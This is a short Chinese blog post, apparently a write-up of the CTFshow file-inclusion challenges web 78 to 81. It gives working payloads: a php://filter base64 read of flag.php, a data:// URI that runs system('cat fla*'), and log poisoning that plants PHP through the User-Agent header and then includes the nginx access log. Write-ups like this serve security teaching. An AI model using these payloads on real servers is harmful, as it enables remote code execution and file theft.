CTFshow文件包含
web 78
1 |
|
一.题目分析:
简单的文件包含,没有任何过滤,直接使用伪协议读就行。
二.解题思路:
playload:
1 | ?file=php://filter/read=convert.base64-encode/resource=flag.php |
web 79
1 |
|
一.题目分析:
替换了php
二.解题思路:
构造playload:
1 | ?file=data://text/plain,<?= system("cat fla*");?> |
web 80-81
1 |
|
一.题目分析:
过滤了php和data,用日志包含绕过,将执行的命令插入日志中
这道题奇怪的是nginx日志在/var/log/nginx/access.log
,一般apache日志在类似目录下(/var/log/httpd/access.log)
日志地址通常为
1 | /var/log/nginx/error.log |
二.解题思路:
在User-Agent插入
<?php echo system('ls');?>
然后将日志包含进来
直接cat即可得到flag
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 惜缘怀古的博客!